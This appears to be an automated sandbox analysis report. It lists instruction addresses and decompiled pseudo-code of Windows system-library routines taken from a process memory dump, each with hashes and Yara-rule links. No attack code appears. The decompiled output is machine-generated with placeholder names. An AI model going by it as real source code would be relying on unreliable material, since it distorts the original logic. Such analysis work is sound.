                                              0x0195beac
                                              0x0195beaf
                                              0x0195beb1
                                              0x0195beb3
                                              0x0195beb3
                                              0x00000000
                                              0x0195bea2
                                              0x0195bea2
                                              0x00000000
                                              0x0195bea2
                                              0x0195be8d
                                              0x0195be8d
                                              0x0195be92
                                              0x00000000
                                              0x0195be92
                                              0x0195be8b
                                              0x0195be60
                                              0x0195be3b
                                              0x0195be3b
                                              0x0195be3e
                                              0x00000000
                                              0x0195be40
                                              0x0195be40
                                              0x0195be44
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x0195be44
                                              0x0195be3e
                                              0x0195be29
                                              0x0195be29
                                              0x00000000
                                              0x0195be29
                                              0x0195be27
                                              0x00000000
                                              0x0191fba7
                                              0x0191fba7
                                              0x0191fbab
                                              0x0195bf02
                                              0x0191fbb1
                                              0x0191fbb1
                                              0x0191fbb8
                                              0x0191fbbd
                                              0x0191fbbd
                                              0x0191fbbf
                                              0x0191fbbf
                                              0x0191fbc5
                                              0x0191fbcb
                                              0x0191fbf8
                                              0x0191fbf8
                                              0x0191fbfa
                                              0x00000000
                                              0x0191fc00
                                              0x0191fc00
                                              0x0191fc03
                                              0x00000000
                                              0x0191fc09
                                              0x0191fc09
                                              0x0191fc0f
                                              0x0191fc15
                                              0x0191fc23
                                              0x0191fc23
                                              0x0191fc25
                                              0x0191fc27
                                              0x0191fc75
                                              0x0191fc7c
                                              0x0191fc84
                                              0x00000000
                                              0x0191fc29
                                              0x0191fc29
                                              0x0191fc2d
                                              0x0191fc30
                                              0x0195bf0f
                                              0x00000000
                                              0x0191fc36
                                              0x0191fc38
                                              0x0191fc3b
                                              0x0191fc41
                                              0x0195bf17
                                              0x0195bf19
                                              0x0195bf48
                                              0x0195bf4b
                                              0x00000000
                                              0x0195bf1b
                                              0x0195bf22
                                              0x0195bf24
                                              0x0195bf26
                                              0x00000000
                                              0x0195bf2c
                                              0x0195bf37
                                              0x0195bf39
                                              0x0195bf3b
                                              0x00000000
                                              0x0195bf41
                                              0x0195bf41
                                              0x0195bf41
                                              0x0195bf41
                                              0x0195bf45
                                              0x00000000
                                              0x0195bf45
                                              0x0195bf3b
                                              0x0195bf26
                                              0x00000000
                                              0x0191fc47
                                              0x0191fc47
                                              0x0191fc49
                                              0x0191fcb2
                                              0x0191fcb4
                                              0x0191fcb6
                                              0x0191fcdc
                                              0x0191fcdc
                                              0x00000000
                                              0x0191fcb8
                                              0x0191fcc3
                                              0x0191fcc5
                                              0x0191fcc7
                                              0x00000000
                                              0x0191fcc9
                                              0x0191fcc9
                                              0x0191fccd
                                              0x00000000
                                              0x0191fccd
                                              0x0191fcc7
                                              0x00000000
                                              0x0191fc4b
                                              0x0191fc4b
                                              0x0191fc4e
                                              0x0191fc4e
                                              0x0191fc51
                                              0x0191fc51
                                              0x0191fc54
                                              0x0191fc5a
                                              0x0191fc5c
                                              0x0191fc5f
                                              0x0191fc61
                                              0x0191fc63
                                              0x0191fc65
                                              0x0191fc67
                                              0x0191fc6e
                                              0x0191fc72
                                              0x0191fc72
                                              0x0191fc72
                                              0x0191fc72
                                              0x0191fc67
                                              0x0191fc61
                                              0x00000000
                                              0x0191fc5a
                                              0x0191fc49
                                              0x0191fc41
                                              0x0191fc30
                                              0x0191fc27
                                              0x0191fc03
                                              0x0191fbcd
                                              0x0191fbd3
                                              0x0191fbd9
                                              0x0191fbdc
                                              0x0191fbde
                                              0x0191fc99
                                              0x0191fc9b
                                              0x0191fc9d
                                              0x0191fcd5
                                              0x0191fcd5
                                              0x0191fc89
                                              0x0191fc89
                                              0x00000000
                                              0x0191fc9f
                                              0x0191fc9f
                                              0x0191fca3
                                              0x00000000
                                              0x0191fca3
                                              0x00000000
                                              0x0191fbe4
                                              0x0191fbe4
                                              0x0191fbe4
                                              0x0191fbe4
                                              0x0191fbe9
                                              0x0191fbf2
                                              0x00000000
                                              0x0191fbf2
                                              0x0191fbde
                                              0x0191fbcb
                                              0x0191fbab
                                              0x0191fc8b
                                              0x0191fc8b
                                              0x0191fc8c
                                              0x0191fb80
                                              0x0191fb72
                                              0x0191fb5e
                                              0x0191fc8d
                                              0x0191fc91
                                              0x0191fadf
                                              0x0191fadf
                                              0x0191fae1
                                              0x0191fae4
                                              0x0191fae7
                                              0x0191faec
                                              0x0191faf8
                                              0x0191fb00
                                              0x0191fb07
                                              0x0191fb0f
                                              0x0191fb0f
                                              0x0191fb07
                                              0x00000000
                                              0x0191faf8
                                              0x0191fadd

                                              Strings
                                              • *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!, xrefs: 0195BE0F
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.347003481.00000000018C0000.00000040.00000001.sdmp, Offset: 018C0000, based on PE: true
                                              Similarity
                                              • API ID:
                                              • String ID: *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!
                                              • API String ID: 0-865735534
                                              • Opcode ID: 65524c27aca2efcb4c82a859e8efa3cd3782180ae763237afcafe6e443efa178
                                              • Instruction ID: 46e524d7838cd40354de0170a648bb630ebe177daeef3ec55adbbc88dba26266
                                              • Opcode Fuzzy Hash: 65524c27aca2efcb4c82a859e8efa3cd3782180ae763237afcafe6e443efa178
                                              • Instruction Fuzzy Hash: 8CA12371B0060E8BEB25DF6CC450B7AB7A9BF48711F04456DEE0EDB684DB34D9899B80
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 018E2D8A, Relevance: 1.4, Strings: 1, Instructions: 191COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 63%
                                              			E018E2D8A(void* __ebx, signed char __ecx, signed int __edx, signed int __edi) {
				signed char _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				signed int _v52;
				void* __esi;
				void* __ebp;
				intOrPtr _t55;
				signed int _t57;
				signed int _t58;
				char* _t62;
				signed char* _t63;
				signed char* _t64;
				signed int _t67;
				signed int _t72;
				signed int _t77;
				signed int _t78;
				signed int _t88;
				intOrPtr _t89;
				signed char _t93;
				signed int _t97;
				signed int _t98;
				signed int _t102;
				signed int _t103;
				intOrPtr _t104;
				signed int _t105;
				signed int _t106;
				signed char _t109;
				signed int _t111;
				void* _t116;

				_t102 = __edi;
				_t97 = __edx;
				_v12 = _v12 & 0x00000000;
				_t55 =  *[fs:0x18];
				_t109 = __ecx;
				_v8 = __edx;
				_t86 = 0;
				_v32 = _t55;
				_v24 = 0;
				_push(__edi);
				if(__ecx == 0x19d5350) {
					_t86 = 1;
					_v24 = 1;
					 *((intOrPtr*)(_t55 + 0xf84)) = 1;
				}
				_t103 = _t102 | 0xffffffff;
				if( *0x19d7bc8 != 0) {
					_push(0xc000004b);
					_push(_t103);
					E019297C0();
				}
				if( *0x19d79c4 != 0) {
					_t57 = 0;
				} else {
					_t57 = 0x19d79c8;
				}
				_v16 = _t57;
				if( *((intOrPtr*)(_t109 + 0x10)) == 0) {
					_t93 = _t109;
					L23();
				}
				_t58 =  *_t109;
				if(_t58 == _t103) {
					__eflags =  *(_t109 + 0x14) & 0x01000000;
					_t58 = _t103;
					if(__eflags == 0) {
						_t93 = _t109;
						E01911624(_t86, __eflags);
						_t58 =  *_t109;
					}
				}
				_v20 = _v20 & 0x00000000;
				if(_t58 != _t103) {
					 *((intOrPtr*)(_t58 + 0x14)) =  *((intOrPtr*)(_t58 + 0x14)) + 1;
				}
				_t104 =  *((intOrPtr*)(_t109 + 0x10));
				_t88 = _v16;
				_v28 = _t104;
				L9:
				while(1) {
					if(E01907D50() != 0) {
						_t62 = ( *[fs:0x30])[0x50] + 0x228;
					} else {
						_t62 = 0x7ffe0382;
					}
					if( *_t62 != 0) {
						_t63 =  *[fs:0x30];
						__eflags = _t63[0x240] & 0x00000002;
						if((_t63[0x240] & 0x00000002) != 0) {
							_t93 = _t109;
							E0197FE87(_t93);
						}
					}
					if(_t104 != 0xffffffff) {
						_push(_t88);
						_push(0);
						_push(_t104);
						_t64 = E01929520();
						goto L15;
					} else {
						while(1) {
							_t97 =  &_v8;
							_t64 = E0191E18B(_t109 + 4, _t97, 4, _t88, 0);
							if(_t64 == 0x102) {
								break;
							}
							_t93 =  *(_t109 + 4);
							_v8 = _t93;
							if((_t93 & 0x00000002) != 0) {
								continue;
							}
							L15:
							if(_t64 == 0x102) {
								break;
							}
							_t89 = _v24;
							if(_t64 < 0) {
								L0193DF30(_t93, _t97, _t64);
								_push(_t93);
								_t98 = _t97 | 0xffffffff;
								__eflags =  *0x19d6901;
								_push(_t109);
								_v52 = _t98;
								if( *0x19d6901 != 0) {
									_push(0);
									_push(1);
									_push(0);
									_push(0x100003);
									_push( &_v12);
									_t72 = E01929980();
									__eflags = _t72;
									if(_t72 < 0) {
										_v12 = _t98 | 0xffffffff;
									}
								}
								asm("lock cmpxchg [ecx], edx");
								_t111 = 0;
								__eflags = 0;
								if(0 != 0) {
									__eflags = _v12 - 0xffffffff;
									if(_v12 != 0xffffffff) {
										_push(_v12);
										E019295D0();
									}
								} else {
									_t111 = _v12;
								}
								return _t111;
							} else {
								if(_t89 != 0) {
									 *((intOrPtr*)(_v32 + 0xf84)) = 0;
									_t77 = E01907D50();
									__eflags = _t77;
									if(_t77 == 0) {
										_t64 = 0x7ffe0384;
									} else {
										_t64 = ( *[fs:0x30])[0x50] + 0x22a;
									}
									__eflags =  *_t64;
									if( *_t64 != 0) {
										_t64 =  *[fs:0x30];
										__eflags = _t64[0x240] & 0x00000004;
										if((_t64[0x240] & 0x00000004) != 0) {
											_t78 = E01907D50();
											__eflags = _t78;
											if(_t78 == 0) {
												_t64 = 0x7ffe0385;
											} else {
												_t64 = ( *[fs:0x30])[0x50] + 0x22b;
											}
											__eflags =  *_t64 & 0x00000020;
											if(( *_t64 & 0x00000020) != 0) {
												_t64 = E01967016(0x1483, _t97 | 0xffffffff, 0xffffffff, 0xffffffff, 0, 0);
											}
										}
									}
								}
								return _t64;
							}
						}
						_t97 = _t88;
						_t93 = _t109;
						E0197FDDA(_t97, _v12);
						_t105 =  *_t109;
						_t67 = _v12 + 1;
						_v12 = _t67;
						__eflags = _t105 - 0xffffffff;
						if(_t105 == 0xffffffff) {
							_t106 = 0;
							__eflags = 0;
						} else {
							_t106 =  *(_t105 + 0x14);
						}
						__eflags = _t67 - 2;
						if(_t67 > 2) {
							__eflags = _t109 - 0x19d5350;
							if(_t109 != 0x19d5350) {
								__eflags = _t106 - _v20;
								if(__eflags == 0) {
									_t93 = _t109;
									E0197FFB9(_t88, _t93, _t97, _t106, _t109, __eflags);
								}
							}
						}
						_push("RTL: Re-Waiting\n");
						_push(0);
						_push(0x65);
						_v20 = _t106;
						E01975720();
						_t104 = _v28;
						_t116 = _t116 + 0xc;
						continue;
					}
				}
			}




































                                              0x018e2d8a
                                              0x018e2d8a
                                              0x018e2d92
                                              0x018e2d96
                                              0x018e2d9e
                                              0x018e2da0
                                              0x018e2da3
                                              0x018e2da5
                                              0x018e2da8
                                              0x018e2dab
                                              0x018e2db2
                                              0x0193f9aa
                                              0x0193f9ab
                                              0x0193f9ae
                                              0x0193f9ae
                                              0x018e2db8
                                              0x018e2dc2
                                              0x0193f9b9
                                              0x0193f9be
                                              0x0193f9bf
                                              0x0193f9bf
                                              0x018e2dcf
                                              0x0193f9c9
                                              0x018e2dd5
                                              0x018e2dd5
                                              0x018e2dd5
                                              0x018e2dde
                                              0x018e2de1
                                              0x018e2e70
                                              0x018e2e72
                                              0x018e2e72
                                              0x018e2de7
                                              0x018e2deb
                                              0x018e2e7c
                                              0x018e2e83
                                              0x018e2e85
                                              0x018e2e8b
                                              0x018e2e8d
                                              0x018e2e92
                                              0x018e2e92
                                              0x018e2e85
                                              0x018e2df1
                                              0x018e2df7
                                              0x018e2df9
                                              0x018e2df9
                                              0x018e2dfc
                                              0x018e2dff
                                              0x018e2e02
                                              0x00000000
                                              0x018e2e05
                                              0x018e2e0c
                                              0x0193f9d9
                                              0x018e2e12
                                              0x018e2e12
                                              0x018e2e12
                                              0x018e2e1a
                                              0x0193f9e3
                                              0x0193f9e9
                                              0x0193f9f0
                                              0x0193f9f6
                                              0x0193f9f8
                                              0x0193f9f8
                                              0x0193f9f0
                                              0x018e2e23
                                              0x0193fa02
                                              0x0193fa03
                                              0x0193fa05
                                              0x0193fa06
                                              0x00000000
                                              0x018e2e29
                                              0x018e2e29
                                              0x018e2e2e
                                              0x018e2e34
                                              0x018e2e3e
                                              0x00000000
                                              0x00000000
                                              0x018e2e44
                                              0x018e2e47
                                              0x018e2e4d
                                              0x00000000
                                              0x00000000
                                              0x018e2e4f
                                              0x018e2e54
                                              0x00000000
                                              0x00000000
                                              0x018e2e5a
                                              0x018e2e5f
                                              0x018e2e9a
                                              0x018e2ea4
                                              0x018e2ea5
                                              0x018e2ea8
                                              0x018e2eaf
                                              0x018e2eb2
                                              0x018e2eb5
                                              0x0193fae9
                                              0x0193faeb
                                              0x0193faed
                                              0x0193faef
                                              0x0193faf7
                                              0x0193faf8
                                              0x0193fafd
                                              0x0193faff
                                              0x0193fb04
                                              0x0193fb04
                                              0x0193faff
                                              0x018e2ec0
                                              0x018e2ec4
                                              0x018e2ec6
                                              0x018e2ec8
                                              0x0193fb14
                                              0x0193fb18
                                              0x0193fb1e
                                              0x0193fb21
                                              0x0193fb21
                                              0x018e2ece
                                              0x018e2ece
                                              0x018e2ece
                                              0x018e2ed7
                                              0x018e2e61
                                              0x018e2e63
                                              0x0193fa6b
                                              0x0193fa71
                                              0x0193fa76
                                              0x0193fa78
                                              0x0193fa8a
                                              0x0193fa7a
                                              0x0193fa83
                                              0x0193fa83
                                              0x0193fa8f
                                              0x0193fa91
                                              0x0193fa97
                                              0x0193fa9d
                                              0x0193faa4
                                              0x0193faaa
                                              0x0193faaf
                                              0x0193fab1
                                              0x0193fac3
                                              0x0193fab3
                                              0x0193fabc
                                              0x0193fabc
                                              0x0193fac8
                                              0x0193facb
                                              0x0193fadf
                                              0x0193fadf
                                              0x0193facb
                                              0x0193faa4
                                              0x0193fa91
                                              0x018e2e6f
                                              0x018e2e6f
                                              0x018e2e5f
                                              0x0193fa13
                                              0x0193fa15
                                              0x0193fa17
                                              0x0193fa1f
                                              0x0193fa21
                                              0x0193fa22
                                              0x0193fa25
                                              0x0193fa28
                                              0x0193fa2f
                                              0x0193fa2f
                                              0x0193fa2a
                                              0x0193fa2a
                                              0x0193fa2a
                                              0x0193fa31
                                              0x0193fa34
                                              0x0193fa36
                                              0x0193fa3c
                                              0x0193fa3e
                                              0x0193fa41
                                              0x0193fa43
                                              0x0193fa45
                                              0x0193fa45
                                              0x0193fa41
                                              0x0193fa3c
                                              0x0193fa4a
                                              0x0193fa4f
                                              0x0193fa51
                                              0x0193fa53
                                              0x0193fa56
                                              0x0193fa5b
                                              0x0193fa5e
                                              0x00000000
                                              0x0193fa5e
                                              0x018e2e23

                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.347003481.00000000018C0000.00000040.00000001.sdmp, Offset: 018C0000, based on PE: true
                                              Similarity
                                              • API ID:
                                              • String ID: RTL: Re-Waiting
                                              • API String ID: 0-316354757
                                              • Opcode ID: 3c1980d3d587c95614ea263beb21f2c54b2b5feaf11d040f44a4f21270ee7959
                                              • Instruction ID: 5c6ef5bcd73afa90d6273beb1875a25975f4511caa9e6ebb0096507f017a2698
                                              • Opcode Fuzzy Hash: 3c1980d3d587c95614ea263beb21f2c54b2b5feaf11d040f44a4f21270ee7959
                                              • Instruction Fuzzy Hash: 1D614731E0061A9FEB32DB6CC844B7EBBEAEF85314F140669D919D72C2D7349A41C782
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 019B0EA5, Relevance: 1.4, Strings: 1, Instructions: 153COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 80%
                                              			E019B0EA5(void* __ecx, void* __edx) {
				signed int _v20;
				char _v24;
				intOrPtr _v28;
				unsigned int _v32;
				signed int _v36;
				intOrPtr _v40;
				char _v44;
				intOrPtr _v64;
				void* __ebx;
				void* __edi;
				signed int _t58;
				unsigned int _t60;
				intOrPtr _t62;
				char* _t67;
				char* _t69;
				void* _t80;
				void* _t83;
				intOrPtr _t93;
				intOrPtr _t115;
				char _t117;
				void* _t120;

				_t83 = __edx;
				_t117 = 0;
				_t120 = __ecx;
				_v44 = 0;
				if(E019AFF69(__ecx,  &_v44,  &_v32) < 0) {
					L24:
					_t109 = _v44;
					if(_v44 != 0) {
						E019B1074(_t83, _t120, _t109, _t117, _t117);
					}
					L26:
					return _t117;
				}
				_t93 =  *((intOrPtr*)(__ecx + 0x3c));
				_t5 = _t83 + 1; // 0x1
				_v36 = _t5 << 0xc;
				_v40 = _t93;
				_t58 =  *(_t93 + 0xc) & 0x40000000;
				asm("sbb ebx, ebx");
				_t83 = ( ~_t58 & 0x0000003c) + 4;
				if(_t58 != 0) {
					_push(0);
					_push(0x14);
					_push( &_v24);
					_push(3);
					_push(_t93);
					_push(0xffffffff);
					_t80 = E01929730();
					_t115 = _v64;
					if(_t80 < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t115) {
						_push(_t93);
						E019AA80D(_t115, 1, _v20, _t117);
						_t83 = 4;
					}
				}
				if(E019AA854( &_v44,  &_v36, _t117, 0x40001000, _t83, _t117,  *((intOrPtr*)(_t120 + 0x34)),  *((intOrPtr*)(_t120 + 0x38))) < 0) {
					goto L24;
				}
				_t60 = _v32;
				_t97 = (_t60 != 0x100000) + 1;
				_t83 = (_v44 -  *0x19d8b04 >> 0x14) + (_v44 -  *0x19d8b04 >> 0x14);
				_v28 = (_t60 != 0x100000) + 1;
				_t62 = _t83 + (_t60 >> 0x14) * 2;
				_v40 = _t62;
				if(_t83 >= _t62) {
					L10:
					asm("lock xadd [eax], ecx");
					asm("lock xadd [eax], ecx");
					if(E01907D50() == 0) {
						_t67 = 0x7ffe0380;
					} else {
						_t67 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
					}
					if( *_t67 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
						E019A138A(_t83,  *((intOrPtr*)(_t120 + 0x3c)), _v44, _v36, 0xc);
					}
					if(E01907D50() == 0) {
						_t69 = 0x7ffe0388;
					} else {
						_t69 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
					}
					if( *_t69 != 0) {
						E0199FEC0(_t83,  *((intOrPtr*)(_t120 + 0x3c)), _v44, _v32);
					}
					if(( *0x19d8724 & 0x00000008) != 0) {
						E019A52F8( *((intOrPtr*)(_t120 + 0x3c)),  *((intOrPtr*)(_t120 + 0x28)));
					}
					_t117 = _v44;
					goto L26;
				}
				while(E019B15B5(0x19d8ae4, _t83, _t97, _t97) >= 0) {
					_t97 = _v28;
					_t83 = _t83 + 2;
					if(_t83 < _v40) {
						continue;
					}
					goto L10;
				}
				goto L24;
			}
























                                              0x019b0eb7
                                              0x019b0eb9
                                              0x019b0ec0
                                              0x019b0ec2
                                              0x019b0ecd
                                              0x019b105b
                                              0x019b105b
                                              0x019b1061
                                              0x019b1066
                                              0x019b1066
                                              0x019b106b
                                              0x019b1073
                                              0x019b1073
                                              0x019b0ed3
                                              0x019b0ed6
                                              0x019b0edc
                                              0x019b0ee0
                                              0x019b0ee7
                                              0x019b0ef0
                                              0x019b0ef5
                                              0x019b0efa
                                              0x019b0efc
                                              0x019b0efd
                                              0x019b0f03
                                              0x019b0f04
                                              0x019b0f06
                                              0x019b0f07
                                              0x019b0f09
                                              0x019b0f0e
                                              0x019b0f14
                                              0x019b0f23
                                              0x019b0f2d
                                              0x019b0f34
                                              0x019b0f34
                                              0x019b0f14
                                              0x019b0f52
                                              0x00000000
                                              0x00000000
                                              0x019b0f58
                                              0x019b0f73
                                              0x019b0f74
                                              0x019b0f79
                                              0x019b0f7d
                                              0x019b0f80
                                              0x019b0f86
                                              0x019b0fab
                                              0x019b0fb5
                                              0x019b0fc6
                                              0x019b0fd1
                                              0x019b0fe3
                                              0x019b0fd3
                                              0x019b0fdc
                                              0x019b0fdc
                                              0x019b0feb
                                              0x019b1009
                                              0x019b1009
                                              0x019b1015
                                              0x019b1027
                                              0x019b1017
                                              0x019b1020
                                              0x019b1020
                                              0x019b102f
                                              0x019b103c
                                              0x019b103c
                                              0x019b1048
                                              0x019b1050
                                              0x019b1050
                                              0x019b1055
                                              0x00000000
                                              0x019b1055
                                              0x019b0f88
                                              0x019b0f9e
                                              0x019b0fa2
                                              0x019b0fa9
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x019b0fa9
                                              0x00000000

                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.347003481.00000000018C0000.00000040.00000001.sdmp, Offset: 018C0000, based on PE: true
                                              Similarity
                                              • API ID:
                                              • String ID: `
                                              • API String ID: 0-2679148245
                                              • Opcode ID: 6da7d07ad361d6d31c6cade71ac3ae1b64f9b022f8602792f67d45aa9529f92c
                                              • Instruction ID: fa80337a087c5e843c9357e01674334bc26c5c82edf510a29dd8c07ade148f1e
                                              • Opcode Fuzzy Hash: 6da7d07ad361d6d31c6cade71ac3ae1b64f9b022f8602792f67d45aa9529f92c
                                              • Instruction Fuzzy Hash: B3518C713043429BD325DF68DAD4B5BBBE9ABC4714F08092CFA8A87291D670E805C762
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 0191F0BF, Relevance: 1.4, Strings: 1, Instructions: 137COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 75%
                                              			E0191F0BF(signed short* __ecx, signed short __edx, void* __eflags, intOrPtr* _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				char* _v20;
				intOrPtr _v24;
				char _v28;
				intOrPtr _v32;
				char _v36;
				char _v44;
				char _v52;
				intOrPtr _v56;
				char _v60;
				intOrPtr _v72;
				void* _t51;
				void* _t58;
				signed short _t82;
				short _t84;
				signed int _t91;
				signed int _t100;
				signed short* _t103;
				void* _t108;
				intOrPtr* _t109;

				_t103 = __ecx;
				_t82 = __edx;
				_t51 = E01904120(0, __ecx, 0,  &_v52, 0, 0, 0);
				if(_t51 >= 0) {
					_push(0x21);
					_push(3);
					_v56 =  *0x7ffe02dc;
					_v20 =  &_v52;
					_push( &_v44);
					_v28 = 0x18;
					_push( &_v28);
					_push(0x100020);
					_v24 = 0;
					_push( &_v60);
					_v16 = 0x40;
					_v12 = 0;
					_v8 = 0;
					_t58 = E01929830();
					_t87 =  *[fs:0x30];
					_t108 = _t58;
					L019077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v72);
					if(_t108 < 0) {
						L11:
						_t51 = _t108;
					} else {
						_push(4);
						_push(8);
						_push( &_v36);
						_push( &_v44);
						_push(_v60);
						_t108 = E01929990();
						if(_t108 < 0) {
							L10:
							_push(_v60);
							E019295D0();
							goto L11;
						} else {
							_t109 = L01904620(_t87,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t82 + 0x18);
							if(_t109 == 0) {
								_t108 = 0xc0000017;
								goto L10;
							} else {
								_t21 = _t109 + 0x18; // 0x18
								 *((intOrPtr*)(_t109 + 4)) = _v60;
								 *_t109 = 1;
								 *((intOrPtr*)(_t109 + 0x10)) = _t21;
								 *(_t109 + 0xe) = _t82;
								 *((intOrPtr*)(_t109 + 8)) = _v56;
								 *((intOrPtr*)(_t109 + 0x14)) = _v32;
								E0192F3E0(_t21, _t103[2],  *_t103 & 0x0000ffff);
								 *((short*)( *((intOrPtr*)(_t109 + 0x10)) + (( *_t103 & 0x0000ffff) >> 1) * 2)) = 0;
								 *((short*)(_t109 + 0xc)) =  *_t103;
								_t91 =  *_t103 & 0x0000ffff;
								_t100 = _t91 & 0xfffffffe;
								_t84 = 0x5c;
								if( *((intOrPtr*)(_t103[2] + _t100 - 2)) != _t84) {
									if(_t91 + 4 > ( *(_t109 + 0xe) & 0x0000ffff)) {
										_push(_v60);
										E019295D0();
										L019077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t109);
										_t51 = 0xc0000106;
									} else {
										 *((short*)(_t100 +  *((intOrPtr*)(_t109 + 0x10)))) = _t84;
										 *((short*)( *((intOrPtr*)(_t109 + 0x10)) + 2 + (( *_t103 & 0x0000ffff) >> 1) * 2)) = 0;
										 *((short*)(_t109 + 0xc)) =  *((short*)(_t109 + 0xc)) + 2;
										goto L5;
									}
								} else {
									L5:
									 *_a4 = _t109;
									_t51 = 0;
								}
							}
						}
					}
				}
				return _t51;
			}

























                                              0x0191f0d3
                                              0x0191f0d9
                                              0x0191f0e0
                                              0x0191f0e7
                                              0x0191f0f2
                                              0x0191f0f4
                                              0x0191f0f8
                                              0x0191f100
                                              0x0191f108
                                              0x0191f10d
                                              0x0191f115
                                              0x0191f116
                                              0x0191f11f
                                              0x0191f123
                                              0x0191f124
                                              0x0191f12c
                                              0x0191f130
                                              0x0191f134
                                              0x0191f13d
                                              0x0191f144
                                              0x0191f14b
                                              0x0191f152
                                              0x0195bab0
                                              0x0195bab0
                                              0x0191f158
                                              0x0191f158
                                              0x0191f15a
                                              0x0191f160
                                              0x0191f165
                                              0x0191f166
                                              0x0191f16f
                                              0x0191f173
                                              0x0195baa7
                                              0x0195baa7
                                              0x0195baab
                                              0x00000000
                                              0x0191f179
                                              0x0191f18d
                                              0x0191f191
                                              0x0195baa2
                                              0x00000000
                                              0x0191f197
                                              0x0191f19b
                                              0x0191f1a2
                                              0x0191f1a9
                                              0x0191f1af
                                              0x0191f1b2
                                              0x0191f1b6
                                              0x0191f1b9
                                              0x0191f1c4
                                              0x0191f1d8
                                              0x0191f1df
                                              0x0191f1e3
                                              0x0191f1eb
                                              0x0191f1ee
                                              0x0191f1f4
                                              0x0191f20f
                                              0x0195bab7
                                              0x0195babb
                                              0x0195bacc
                                              0x0195bad1
                                              0x0191f215
                                              0x0191f218
                                              0x0191f226
                                              0x0191f22b
                                              0x00000000
                                              0x0191f22b
                                              0x0191f1f6
                                              0x0191f1f6
                                              0x0191f1f9
                                              0x0191f1fb
                                              0x0191f1fb
                                              0x0191f1f4
                                              0x0191f191
                                              0x0191f173
                                              0x0191f152
                                              0x0191f203

                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.347003481.00000000018C0000.00000040.00000001.sdmp, Offset: 018C0000, based on PE: true
                                              Similarity
                                              • API ID:
                                              • String ID: @
                                              • API String ID: 0-2766056989
                                              • Opcode ID: 4b412e15f740e7d19b187a206102b9820fe056b1c8be356b654954a4ccb32fe9
                                              • Instruction ID: e4d83568624067491504c3fd0c02582e41516742bf290eb801bf308c6f5a108d
                                              • Opcode Fuzzy Hash: 4b412e15f740e7d19b187a206102b9820fe056b1c8be356b654954a4ccb32fe9
                                              • Instruction Fuzzy Hash: 20519C716007159FD321DF28C840A6BBBF9FF88710F00892DFA9997690E7B4E944CB91
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 01963540, Relevance: 1.4, Strings: 1, Instructions: 130COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 75%
                                              			E01963540(intOrPtr _a4) {
				signed int _v12;
				intOrPtr _v88;
				intOrPtr _v92;
				char _v96;
				char _v352;
				char _v1072;
				intOrPtr _v1140;
				intOrPtr _v1148;
				char _v1152;
				char _v1156;
				char _v1160;
				char _v1164;
				char _v1168;
				char* _v1172;
				short _v1174;
				char _v1176;
				char _v1180;
				char _v1192;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				short _t41;
				short _t42;
				intOrPtr _t80;
				intOrPtr _t81;
				signed int _t82;
				void* _t83;

				_v12 =  *0x19dd360 ^ _t82;
				_t41 = 0x14;
				_v1176 = _t41;
				_t42 = 0x16;
				_v1174 = _t42;
				_v1164 = 0x100;
				_v1172 = L"BinaryHash";
				_t81 = E01920BE0(0xfffffffc,  &_v352,  &_v1164, 0, 0, 0,  &_v1192);
				if(_t81 < 0) {
					L11:
					_t75 = _t81;
					E01963706(0, _t81, _t79, _t80);
					L12:
					if(_a4 != 0xc000047f) {
						E0192FA60( &_v1152, 0, 0x50);
						_v1152 = 0x60c201e;
						_v1148 = 1;
						_v1140 = E01963540;
						E0192FA60( &_v1072, 0, 0x2cc);
						_push( &_v1072);
						E0193DDD0( &_v1072, _t75, _t79, _t80, _t81);
						E01970C30(0, _t75, _t80,  &_v1152,  &_v1072, 2);
						_push(_v1152);
						_push(0xffffffff);
						E019297C0();
					}
					return E0192B640(0xc0000135, 0, _v12 ^ _t82, _t79, _t80, _t81);
				}
				_t79 =  &_v352;
				_t81 = E01963971(0, _a4,  &_v352,  &_v1156);
				if(_t81 < 0) {
					goto L11;
				}
				_t75 = _v1156;
				_t79 =  &_v1160;
				_t81 = E01963884(_v1156,  &_v1160,  &_v1168);
				if(_t81 >= 0) {
					_t80 = _v1160;
					E0192FA60( &_v96, 0, 0x50);
					_t83 = _t83 + 0xc;
					_push( &_v1180);
					_push(0x50);
					_push( &_v96);
					_push(2);
					_push( &_v1176);
					_push(_v1156);
					_t81 = E01929650();
					if(_t81 >= 0) {
						if(_v92 != 3 || _v88 == 0) {
							_t81 = 0xc000090b;
						}
						if(_t81 >= 0) {
							_t75 = _a4;
							_t79 =  &_v352;
							E01963787(_a4,  &_v352, _t80);
						}
					}
					L019077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v1168);
				}
				_push(_v1156);
				E019295D0();
				if(_t81 >= 0) {
					goto L12;
				} else {
					goto L11;
				}
			}































                                              0x01963552
                                              0x0196355a
                                              0x0196355d
                                              0x01963566
                                              0x01963567
                                              0x0196357e
                                              0x0196358f
                                              0x019635a1
                                              0x019635a5
                                              0x0196366b
